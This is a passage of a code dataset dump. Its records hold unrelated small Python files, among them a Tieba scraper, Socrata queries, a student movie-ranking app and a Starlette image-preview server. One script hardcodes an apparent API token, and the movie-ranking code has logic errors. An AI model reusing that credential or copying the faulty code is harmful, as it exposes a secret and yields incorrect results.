theMax = x\n theIndex = index\n print('The max value is ' + str(theMax) + ' at index ' + str(theIndex))","sub_path":"popeye/web_server/listing_exec_app/lib/default_code/ch_4/Listing_4_6.py","file_name":"Listing_4_6.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"632315430","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('establish', views.establish),\n path('business', views.business),\n path('activity', views.activity),\n path('scontent', views.scontent),\n path('news', views.news),\n path('support', views.support),\n path('team', views.team),\n path('event', views.event),\n path('map', views.map),\n path('board/', views.board),\n path('board//', views.viewboard, name='viewboard'),\n]","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"254411120","text":"from os import listdir\nfrom os.path import isfile, join\n\nwad_dir = '../../data/maps/out/'\n\n\ndef get_valid_wad_ids(wad_dir):\n all_files = [f for f in listdir(wad_dir) if isfile(join(wad_dir, f))]\n wad_files = [f for f in all_files if f.endswith('wad')]\n wad_ids = [int(f.split('_')[1]) for f in wad_files]\n wad_ids.sort()\n\n return wad_ids\n","sub_path":"examples/python/train_sptm/src/train/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"489530826","text":"# -*-coding=utf-8-*-\r\n\"\"\"\r\nWherever smart people work, doors are unlocked. -- Steve Wozniak\r\n\"\"\"\r\n#############\r\n#需求分析\r\n#1. 需要有url_list\r\n#2. 需要get并且decode_url\r\n#3. 保准html页面\r\n##属性\r\n# 通过分析贴吧url:https://tieba.baidu.com/f?ie=utf-8&kw=%E6%9B%BC%E8%81%94&fr=search\r\n# 发现的是只需要修改kw(key_word)后面的str即可改变访问哪个贴吧\r\n# pn = 0 代表第一页,pn = 50 带表第二页 ,依次类推\r\n## 1. 贴吧的名字\r\n## 2. 需要爬取的页数\r\n## 3. requests请求头\r\n\r\n## 方法\r\n# 1.获取url\r\n# 2.url get + decode\r\n# 3.html保存\r\n\r\n## 发现的问题\r\n# 1. class name 后面不用()\r\n# 2. request的get的url需要使用type(str)\r\n# 3. 为什么存放url用的是list而不是例如tuple\r\n# - list是可变对象 而tuple是不可变的对象?\r\n# 4.属性缺失爬虫的请求头\r\n# 5. utf 经常写成uft\r\n\r\n## 不熟练的地方\r\n# 1. str 的 format\r\n# 2. 类名需要使用大驼峰命名法\r\n# 3. 
python 对文件的操作 with open 等用法\r\n#############\r\nimport requests\r\n\r\nclass SpiderTieba:\r\n def __init__(self, name, page_num_total, headers):\r\n self.name = name\r\n self.page_num_total = page_num_total\r\n self.headers = headers\r\n \r\n def url_source(self):\r\n url_list = []\r\n for page_num in range(self.page_num_total):\r\n url_new = 'https://tieba.baidu.com/f?kw={}&ie=utf-8&pn={}'.format(self.name, page_num*50)\r\n url_list.append(url_new)\r\n return url_list\r\n \r\n def url_parse(self, url):\r\n response = requests.get(url=url, headers=self.headers)\r\n return response.content.decode()\r\n\r\n def save_html(self, url_parsed_file, page_num):\r\n '''[summary]\r\n \r\n Arguments:\r\n url_parsed_file {[html]} -- [description:url解析后的文件,由url_parse()返回结果得到]\r\n page_num {[number]} -- [description:页码]\r\n '''\r\n html_save_path = '.\\{}吧的第{}页.html'.format(self.name, page_num)\r\n with open(html_save_path, \"w\", encoding = 'utf-8') as f:\r\n f.write(url_parsed_file)\r\n\r\n def run(self):\r\n url_list = self.url_source()\r\n for (page_num, url) in enumerate(url_list):\r\n self.save_html(self.url_parse(url), page_num+1)\r\n\r\nif __name__ == \"__main__\":\r\n name = '皇马'\r\n page_num_total = 5\r\n headers = headers ={'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'} \r\n \r\n Spider_Tieba_Huangma = SpiderTieba(name, page_num_total, headers)\r\n Spider_Tieba_Huangma.run()\r\n \r\n\r\n","sub_path":"爬虫/爬取皇马吧html/tieba_spider.py","file_name":"tieba_spider.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"574609003","text":"import pygame, time\n\nclass SequenceAnimation(pygame.sprite.RenderPlain):\n def __init__(self,spritesheetname,framew,frameh,frametime,beginsequence,beginframe,pos):\n spritesheet = pygame.image.load(spritesheetname)\n self.STATE_DRAWING = 0\n self.STATE_STATIC = 1\n self.spritesheet = spritesheet\n self.framew = framew\n self.frameh = frameh\n self.frametime = frametime\n self.state = self.STATE_STATIC\n self.currentimage = [beginframe,beginsequence]\n self.image = pygame.Surface((framew,frameh))\n self.rect = pygame.Rect(pos,pos)\n self.currentsequence = beginsequence\n self.currentframe = beginframe\n self.updateImage()\n self.timer = 0\n self.maxframe = spritesheet.get_width()/framew-1\n self.maxsequence = spritesheet.get_height()/frameh-1\n \n \n def updateImage(self):\n frame = self.currentframe\n seq = self.currentsequence\n #print(\"getting image form frame \" + str(frame) + \" and seq \" + str(seq))\n fromarea = pygame.Rect(frame*self.framew,seq*self.frameh,self.framew,self.frameh)\n self.image.fill((0,0,0))\n self.image.blit(self.spritesheet,(0,0),fromarea)\n \n def beginSequence(self,seq):\n self.state = self.STATE_DRAWING\n self.currentsequence = seq\n self.currentframe = 0\n self.updateImage()\n self.timer = time.time()\n \n def setStaticFrame(self,frame,seq):\n self.currentframe = frame\n self.currentsequence = seq\n self.state = self.STATE_STATIC\n print(\"Setting static frame \"+str(frame)+\" \"+str(seq))\n #exit()\n self.updateImage()\n \n def update(self):\n if self.state == self.STATE_STATIC:\n return None\n \n t = time.time()\n #print(\"time was \" + str(t))\n dt = 1000*(t - self.timer)\n if dt > self.frametime:\n self.currentframe = self.currentframe + 1;\n self.timer = time.time() \n if self.currentframe > self.maxframe:\n self.currentframe = 0\n 
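# redraw the sprite image after advancing (and possibly wrapping) the frame counter\n            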
self.updateImage()\n","sub_path":"GuyBrushPlatform/src/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"493288422","text":"from sodapy import Socrata\r\n\r\nclient = Socrata(\"data.energystar.gov\", \"vgyKxcIsmG0ygfvItqpaxSzdb\")\r\npower = 20\r\nproducts = {\"Light_Bulb\":\"sqpq-tg7c\",\"Ceiling_Fan\":\"qq83-fs92\"}\r\ndata = client.get(\"sqpq-tg7c\", content_type=\"json\",technology=\"LED\", where='energy_used_watts>=' + str(power), order='energy_used_watts')\r\nprint(\"hello\")\r\n\r\n_prod_type = 'product_type like light'\r\n_prod = products[\"Ceiling_Fan\"]\r\n#query_data = client.get( _prod, content_type=\"json\", indoor_outdoor=\"indoor\", where='product_type like light', limit=10)\r\nquery_data1 = client.get( _prod, content_type=\"json\", where='fan_power_consumption_high_speed_w > 30', order='fan_power_consumption_high_speed_w ASC')\r\nquery_data1 = client.get( _prod, content_type=\"json\", where='fan_power_consumption_high_speed_w < 30', order='fan_power_consumption_high_speed_w DESC')\r\nquery_data2 = client.get( _prod, content_type=\"json\",indoor_outdoor='indoor', limit=10)\r\n#query_data3 = client.get( _prod, content_type=\"json\",where=\"product_type like indoor\", limit=10)\r\nprint(\"hello\")\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"testing_energy_star_product_finder.py","file_name":"testing_energy_star_product_finder.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"444898027","text":"def fibonnaci_numbers(chosen_range):\n fib_nums = [1]\n current_num = 0\n\n for num in range(0, chosen_range - 1):\n fib_nums.append(fib_nums[num] + current_num)\n current_num = fib_nums[num]\n\n return fib_nums\n\nbound = int(input(\"How many fibonnacci numbers do you want?: \"))\nprint(fibonnaci_numbers(bound))","sub_path":"python_beginner_exercises/exercise_13.py","file_name":"exercise_13.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"153590711","text":"import math\n\ndef binary(binaryString):\n\tbits = len(binaryString)-1\n\tdecimalNum = 0\n\tfor character in binaryString:\n\t\tdecimalNum += math.pow(2, bits) * int(character)\n\t\tbits -= 1\n\tprint(str(binaryString) + \" in decimal is \" + str(decimalNum))\n\ndef main():\n\tbinaryString = input(\"Enter a binary number: \")\n\tbinary(binaryString)\n\nmain()","sub_path":"daily_python_5-20.py","file_name":"daily_python_5-20.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"162908663","text":"\"\"\"\n * Copyright 2020, Departamento de sistemas y Computación, Universidad de Los Andes\n * \n * Contribución de:\n *\n * Cristian Camilo Castellanos\n *\n * Desarrolado para el curso ISIS1225 - Estructuras de Datos y Algoritmos\n *\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see <http://www.gnu.org/licenses/>.\n \"\"\"\n\n\"\"\"\n Este módulo es una aplicación básica con un menú de opciones para cargar datos, contar elementos, y hacer búsquedas sobre una lista .\n\"\"\"\n\nimport config as cf\nimport sys\nimport csv\n\nfrom ADT import list as lt\nfrom DataStructures import listiterator as it\nfrom DataStructures import liststructure as lt\n\nfrom time import process_time \n\n\n\ndef printMenu():\n \"\"\"\n Imprime el menu de opciones\n \"\"\"\n print(\"\\nBienvenido\")\n print(\"1- Cargar Datos\")\n print(\"2- Ranking de peliculas\")\n print(\"3- Conocer un director\")\n print(\"4- Conocer un actor\")\n print(\"5- Entender un genero\")\n print(\"6- Crear ranking\")\n print(\"0- Salir\")\n\n\n\n\ndef compareRecordIds (recordA, recordB):\n if int(recordA['id']) == int(recordB['id']):\n return 0\n elif int(recordA['id']) > int(recordB['id']):\n return 1\n return -1\n\n\n\ndef loadCSVFile (file, cmpfunction):\n lst=lt.newList(\"ARRAY_LIST\", cmpfunction)\n dialect = csv.excel()\n dialect.delimiter=\";\"\n try:\n with open( cf.data_dir + file, encoding=\"utf-8\") as csvfile:\n row = csv.DictReader(csvfile, dialect=dialect)\n for elemento in row: \n lt.addLast(lst,elemento)\n except:\n print(\"Hubo un error con la carga del archivo\")\n return lst\n\n\ndef loadMovies ():\n lst = loadCSVFile(\"theMoviesdb/MoviesCastingRaw-small.csv\",compareRecordIds) \n print(\"Datos cargados, \" + str(lt.size(lst)) + \" elementos cargados\")\n return lst\n\ndef loadDetails():\n lst=loadCSVFile(\"theMoviesdb/SmallMoviesDetailsCleaned.csv\",compareRecordIds)\n print(\"Datos cargados, \" + str(lt.size(lst)) + \" elementos cargados\")\n return lst\n\n# ranking elements are [title, value] pairs, so the comparators compare the numeric value directly\ndef comparacion_m1 (element1, element2):\n return element1[1] > element2[1]\n\ndef comparacion_me1 (element1, element2):\n return element1[1] < element2[1]\n\ndef comparacion_m_v1 (element1, element2):\n return element1[1] < element2[1]\n\ndef comparacion_me_v2 (element1, element2):\n return element1[1] > element2[1]\n\ndef ranking_peliculas (num_peli, v_p, as_des, lstD): #Requerimiento 2\n ranking = lt.newList('SINGLE_LINKED', None)\n t1_start = process_time()\n if (lstD[\"size\"])==0:\n print(\"La lista esta vacía\") \n return 0\n num_peli = int(num_peli)\n pelis = []\n conta = 0\n if num_peli >= 10:\n nombre = \"\"\n if v_p.lower() == \"promedio\" and as_des.lower() == \"ascendente\":\n for i in range(1, lt.size(lstD)):\n element = lt.getElement(lstD, i)\n if float(element[\"vote_average\"]) > 0 and element[\"title\"] not in pelis:\n x = float(element[\"vote_average\"])\n nombre = element[\"title\"]\n lt.addFirst(ranking,[nombre,x])\n pelis.append(nombre)\n conta = conta + 1\n \n if v_p.lower() == \"promedio\" and as_des.lower() == \"descendente\":\n for i in range(1, lt.size(lstD)):\n element = lt.getElement(lstD, i)\n if float(element[\"vote_average\"]) < 10 and element[\"title\"] not in pelis:\n y = float(element[\"vote_average\"])\n nombre = element[\"title\"]\n lt.addFirst(ranking,[nombre,y])\n pelis.append(nombre)\n conta = conta + 1\n \n if v_p.lower() == \"votos\" and as_des.lower() == \"ascendente\":\n for i in range(1, lt.size(lstD)):\n element = lt.getElement(lstD, i)\n if float(element[\"vote_count\"]) > 0 and element[\"title\"] not in pelis:\n x = float(element[\"vote_count\"])\n nombre = 
element[\"title\"]\n lt.addFirst(ranking,[nombre,x])\n pelis.append(nombre)\n conta = conta + 1\n \n if v_p.lower() == \"votos\" and as_des.lower() == \"descendente\":\n for i in range(1, lt.size(lstD)):\n element = lt.getElement(lstD, i)\n if float(element[\"vote_count\"]) < 13000 and element[\"title\"] not in pelis:\n y = float(element[\"vote_count\"])\n nombre = element[\"title\"]\n lt.addFirst(ranking,[nombre,y])\n pelis.append(nombre)\n conta = conta + 1\n \n if v_p.lower() == \"promedio\" and v_p.lower() == \"ascendente\":\n lt.insertion(ranking, comparacion_m1)\n if v_p.lower() == \"promedio\" and v_p.lower() == \"descendente\":\n lt.insertion(ranking, comparacion_me1)\n if v_p.lower() == \"votos\" and v_p.lower() == \"ascendente\":\n lt.insertion(ranking, comparacion_m_v1)\n if v_p.lower() == \"votos\" and v_p.lower() == \"descendente\":\n lt.insertion(ranking, comparacion_me_v2)\n \n t1_stop = process_time()\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n\n return (ranking)\n\ndef peliculas_por_director(criteria, column, lst):\n peliculas_director=lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterator=it.newIterator(lst)\n while it.hasNext(iterator):\n element=it.next(iterator)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_director,element[\"id\"])\n return peliculas_director\n\ndef conocer_director(criteria, column, lstC,lstD): #Requerimiento 3\n t1_start = process_time() #tiempo inicial\n sum_average=0\n lista_director=lt.newList(\"ARRAY_LIST\", None)\n peliculas_director=peliculas_por_director(criteria,\"director_name\",lstC)\n if (lstD[\"size\"])==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterator2=it.newIterator(lstD)\n while it.hasNext(iterator2):\n element=it.next(iterator2)\n if element[\"id\"] in peliculas_director[\"elements\"]:\n sum_average+=float(element[\"vote_average\"])\n lt.addFirst(lista_director,element[\"original_title\"])\n promedio=round((sum_average/lista_director[\"size\"]),3)\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (lista_director,promedio)\n\ndef peliculas_por_actor1(criteria, column, lst):\n peliculas_actor = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor,element[\"id\"])\n return peliculas_actor\n\ndef peliculas_por_actor2(criteria, column, lst):\n peliculas_actor2 = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor2,element[\"id\"])\n return peliculas_actor2\n\ndef peliculas_por_actor3(criteria, column, lst):\n peliculas_actor3 = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor3,element[\"id\"])\n return peliculas_actor3\n\ndef peliculas_por_actor4(criteria, column, lst):\n peliculas_actor4 = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n 
iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor4,element[\"id\"])\n return peliculas_actor4\n\ndef peliculas_por_actor5(criteria, column, lst):\n peliculas_actor5 = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor5,element[\"id\"])\n return peliculas_actor5\n\ndef conocer_actor(criteria, lstC, lstD): #Requerimiento 4\n t1_start = process_time()\n suma = 0\n peli_actor = lt.newList(\"ARRAY_LIST\", None)\n peliculas_actor = peliculas_por_actor1(criteria, \"actor1_name\", lstC)\n peliculas_actor2 = peliculas_por_actor2(criteria, \"actor2_name\", lstC)\n peliculas_actor3 = peliculas_por_actor3(criteria, \"actor3_name\", lstC)\n peliculas_actor4 = peliculas_por_actor4(criteria, \"actor4_name\", lstC)\n peliculas_actor5 = peliculas_por_actor5(criteria, \"actor5_name\", lstC)\n\n if (lstD[\"size\"]) == 0:\n print(\"La Lista esta vacía\")\n return 0\n \n else:\n iterador = it.newIterator(lstD)\n iterador2 = it.newIterator(lstC)\n while it.hasNext(iterador) and it.hasNext(iterador2):\n element = it.next(iterador)\n element2 = it.next(iterador2)\n if element[\"id\"] in peliculas_actor[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n elif element[\"id\"] in peliculas_actor2[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n elif element[\"id\"] in peliculas_actor3[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n elif element[\"id\"] in peliculas_actor4[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n elif element[\"id\"] in peliculas_actor5[\"elements\"]:\n suma = suma + float(element[\"vote_average\"])\n lt.addLast(peli_actor, element[\"original_title\"])\n lt.addLast(peli_actor, element2[\"director_name\"])\n\n prom = round((suma/peli_actor[\"size\"]),3)\n t1_stop = process_time()\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (peli_actor, prom)\n\ndef entender_genero(criteria,column,lstD): #Requerimiento 5\n t1_start=process_time()#tiempo inicial\n sum_count=0\n lista_genero=lt.newList(\"ARRAY_LIST\",None)\n if lstD[\"size\"]==0:\n print(\"la lista esta vacía\")\n else:\n iterator=it.newIterator(lstD)\n while it.hasNext(iterator):\n element=it.next(iterator)\n if criteria.lower() in element[column].lower():\n lt.addLast(lista_genero,element[\"original_title\"])\n sum_count+=float((element[\"vote_average\"]))\n promedio=round((sum_count/lista_genero[\"size\"]),3)\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (lista_genero,promedio)\n\ndef ranking_genero (lista_Details, genero, No_peliculas, criteria_r, criteria_o): #Requerimiento 6\n buscar_genero = lt.newList('SINGLE_LINKED', None)\n #------------------------------------\n\n t1_start = process_time() #Inicio de cronometro \n\n 
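# the 'genres' field is a '|'-separated string (e.g. 'Action|Comedy'), so each record is split before matching\n    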
#Filtrar las peliculas por genero\n \n iter = it.newIterator(lista_Details)\n while it.hasNext(iter):\n c = it.next(iter)\n genero_separado = c[\"genres\"].split(\"|\")\n i = 0\n tam = len(genero_separado)\n \n while i < tam:\n \n if (genero_separado[i] == genero):\n lt.addFirst(buscar_genero, c)\n i += 1\n \n \n #Crear Ranking\n \n generos_ordenados = lt.newList('SINGLE_LINKED', None)\n PARAMETROS_NO = \"Parametro no valido\" #Variable para comprobar que todos los parametros hayan sido procesados\n cont = 0 #Variable para contar las peliculas\n mayor = lt.firstElement(buscar_genero)\n menor = lt.lastElement(buscar_genero)\n if lt.isEmpty(buscar_genero):\n print(\"No se encontraron peliculas de ese genero\")\n elif (criteria_o == \"ascendente\"and No_peliculas >= 10):\n \n \n if (criteria_r == \"count\"):\n ma = mayor[\"vote_count\"]\n me = menor[\"vote_count\"]\n print(ma)\n iter2 = it.newIterator(buscar_genero)\n \n while it.hasNext(iter2):\n d = it.next(iter2)\n \n if(int(d[\"vote_count\"]) >= int(ma)):\n lt.addFirst(generos_ordenados,d)\n ma = int(d[\"vote_count\"])\n if(int(d[\"vote_count\"]) <= int(me)):\n lt.addLast(generos_ordenados,d)\n me = int(d[\"vote_count\"])\n \n\n elif (criteria_r == \"average\"):\n ma = mayor[\"vote_average\"]\n me = menor[\"vote_average\"]\n print(ma)\n iter2 = it.newIterator(buscar_genero)\n \n while it.hasNext(iter2):\n d = it.next(iter2)\n \n if(float(d[\"vote_average\"]) >= float(ma)):\n lt.addFirst(generos_ordenados,d)\n ma = float(d[\"vote_average\"])\n if(float(d[\"vote_average\"]) <= float(me)):\n lt.addLast(generos_ordenados,d)\n me = float(d[\"vote_average\"])\n \n \n else:\n return PARAMETROS_NO\n\n elif (criteria_o == \"descendente\"and No_peliculas >= 10):\n \n if (criteria_r == \"count\"):\n ma = mayor[\"vote_count\"]\n me = menor[\"vote_count\"]\n print(ma)\n iter2 = it.newIterator(buscar_genero)\n \n while it.hasNext(iter2):\n d = it.next(iter2)\n \n if(int(d[\"vote_count\"]) >= int(ma)):\n lt.addLast(generos_ordenados,d)\n ma = int(d[\"vote_count\"])\n if(int(d[\"vote_count\"]) <= int(me)):\n lt.addFirst(generos_ordenados,d)\n me = int(d[\"vote_count\"])\n \n \n elif (criteria_r == \"average\"):\n ma = mayor[\"vote_average\"]\n me = menor[\"vote_average\"]\n print(ma)\n iter2 = it.newIterator(buscar_genero)\n \n while it.hasNext(iter2):\n d = it.next(iter2)\n \n if(float(d[\"vote_average\"]) >= float(ma)):\n lt.addLast(generos_ordenados,d)\n ma = float(d[\"vote_average\"])\n if(float(d[\"vote_average\"]) <= float(me)):\n lt.addFirst(generos_ordenados,d)\n me = float(d[\"vote_average\"])\n \n else:\n return PARAMETROS_NO\n else:\n return PARAMETROS_NO\n \n Peliculas_en_ranking = lt.size(generos_ordenados)\n Votos_totales = 0\n Votos_Promedio = 0.0\n \n #Imprimir ranking\n \n print(\"Película , Genero , Vote_Average , Vote_Count\")\n iterfinal = it.newIterator(generos_ordenados)\n while it.hasNext(iterfinal):\n\n f = it.next(iterfinal)\n if (cont == No_peliculas):\n break\n Votos_totales = Votos_totales + int(f[\"vote_count\"])\n Votos_Promedio = Votos_Promedio + float(f[\"vote_average\"])\n Pel = str(f[\"original_title\"])\n Gen = str(f[\"genres\"])\n Av = str(f[\"vote_average\"])\n Co = str(f[\"vote_count\"])\n\n print(Pel +\" I \"+ Gen +\" I \"+ Av +\" I \"+ Co)\n cont += 1\n\n Promedio = Votos_Promedio/Peliculas_en_ranking\n\n print(\"Promedio(Vote average): \" + str(Promedio))\n print(\"Votos totales: \" + str(Votos_totales))\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" 
segundos\")\n\n\ndef main():\n \"\"\"\n Método principal del programa, se encarga de manejar todos los metodos adicionales creados\n\n Instancia una lista vacia en la cual se guardarán los datos cargados desde el archivo\n Args: None\n Return: None \n \"\"\"\n lstmovies = {\"size\":0}\n while True:\n printMenu() #imprimir el menu de opciones en consola\n inputs =input('Seleccione una opción para continuar\\n') #leer opción ingresada\n if len(inputs)>0:\n if int(inputs[0])==1: #opcion 1\n lstmovies = loadMovies()\n lstdetails = loadDetails()\n\n elif int(inputs[0])==2: #opcion 2\n if lstmovies == None or lstmovies['size'] == 0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else: #(num_peli, v_p, as_des, elemento1, elemento2, lstD)\n num_peli = input('Ingrese el número de peliculas, mínimo 10: \\n')\n v_p = input(\"Ingrese la cantidad por la que se quiere ordenar (promedio o votos): \\n\")\n as_des = input(\"Ingrese el orden en el que se quiere ordenar (ascendente o descendente): \\n\")\n\n x = ranking_peliculas(num_peli, v_p, as_des, lstmovies) #filtrar una columna por criterio \n print(\"El ranking es el siguiente: \",x)\n\n elif int(inputs[0])==3: #opcion 3\n if lstmovies == None or lstmovies['size'] == 0 and lstdetails == None or lstdetails['size'] == 0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else: \n criteria = input('Ingrese el nombre del director: \\n')\n x = conocer_director(criteria, \"director_name\" ,lstmovies, lstdetails) #filtrar una columna por criterio \n print(\"Coinciden \",x,\" elementos con el director: \",criteria)\n\n elif int(inputs[0])==4: #opcion 4\n if lstdetails == None or lstdetails['size']==0 and lstmovies==None or lstmovies['size']==0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else: \n criteria = input('Ingrese el nombre del actor: \\n')\n x = conocer_actor(criteria,lstmovies, lstdetails) #filtrar una columna por criterio \n print(\"Coinciden \",x,\" elementos con el actor: \",criteria)\n elif int(inputs[0])==5: #opcion 5\n if lstmovies == None or lstmovies['size'] == 0 and lstdetails == None or lstdetails['size'] == 0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else: \n criteria = input('Ingrese el género: \\n')\n x = entender_genero(criteria, \"genres\" ,lstdetails) #filtrar una columna por criterio \n print(\"Coinciden \",x,\" elementos con el género: \",criteria)\n\n elif int(inputs[0])==6: #opcion 6\n if lstdetails == None or lstdetails['size'] == 0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else:\n genero = input(\"Ingrese el nombre del genero:\\n\")\n No_peliculas = int(input(\"Ingrese el número de películas (Mínimo 10):\\n\"))#------------------------------------\n criteria_r = input(\"Ingrese el criterio del ranking (count o average)::\\n\")#------------------------------------\n criteria_o = input(\"Ingrese el criterio de ordenamiento (ascendente o descendente):\\n\")#------------------------------------\n x = ranking_genero(lstdetails, genero, No_peliculas, criteria_r, criteria_o)\n print(\"Gracias\")\n\n elif int(inputs[0])==0: #opcion 0, salir\n print(\"Vuelva pronto\")\n sys.exit(0)\n \nif __name__ == \"__main__\":\n main()","sub_path":"App/reto.py","file_name":"reto.py","file_ext":"py","file_size_in_byte":21315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"556232834","text":"import os\nimport hashlib\n\nfrom starlette.applications import Starlette\nfrom 
starlette.routing import Route\nfrom starlette.requests import Request\nfrom starlette.responses import FileResponse, PlainTextResponse\n\nfrom preview_generator.manager import PreviewManager\n\n\nUPLOAD_DIR = '/tmp/files/'\nCACHE_PATH = '/tmp/cache/'\n\n\nmanager = PreviewManager(CACHE_PATH, create_folder=True)\n\n\nasync def _store_uploaded_file(file) -> str:\n contents = await file.read()\n h = hashlib.md5(contents).hexdigest()\n upload_dest = os.path.join(UPLOAD_DIR, h)\n\n with open(upload_dest, 'wb') as f:\n f.write(contents)\n\n return upload_dest\n\n\nasync def health_endpoint(request):\n return PlainTextResponse('OK')\n\n\nasync def preview_endpoint(request):\n width = request.path_params['width']\n height = request.path_params['height']\n\n form = await request.form()\n file_path = await _store_uploaded_file(form['file'])\n\n image = manager.get_jpeg_preview(file_path, width=width, height=height)\n\n return FileResponse(image)\n\n\napp = Starlette(routes=[\n Route('/', endpoint=health_endpoint),\n Route('/preview/{width:int}x{height:int}',\n endpoint=preview_endpoint, methods=['POST']),\n])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"345786144","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 28 10:52:11 2018\n\n@author: Niels\n\"\"\"\n\ndef Timer(iteration_variable,itr=1,t=[0],itr_show=1):\n import time\n if itr_show==1: \n print('\\rIteration {} of {}'.format(iteration_variable+1, itr), end='') \n if iteration_variable==1:\n itr=itr-1\n timed=time.time()-t[0] # calculate an estimate of total run time before done\n mins=int((itr*timed)/60)\n secs=int((itr*timed)%60)\n print(\"\\rEstimate until done: {} minutes {} seconds\".format(mins,secs))\n t[0]=0\n elif iteration_variable==0 and itr!=1: \n t[0]+=time.time()\n return\n\ndef cont_timer(start_time,stop,printing=0):\n import time\n if stop==1:\n timed=time.time()-start_time # calculate an estimate of total run time before done\n if printing==1:\n print(\"\\n\")\n print(\"{} ms\".format(int(timed*1000)))\n return int(timed*1000)\n if stop==0:\n return time.time()\n \ndef log(data,file_name=\"output.txt\",log_s='0',open_file=0):\n if open_file==1:\n with open(file_name, 'a') as f:\n f.write(\"\\n\")\n f.write(log_s)\n f.write(\"\\n\")\n f.write(\"[\")\n if open_file==-1:\n with open(file_name, 'a') as f:\n f.write(str(data))\n f.write(\"]\")\n f.write('\\n')\n f.close()\n if open_file==0:\n with open(file_name, 'a') as f:\n f.write(str(data))\n f.write(\", \") ","sub_path":"project_code/J/N_timer.py","file_name":"N_timer.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"372496620","text":"import numpy as np\nimport ctypes as ct\nimport matplotlib.pyplot as plt\nimport time\n# For Python under 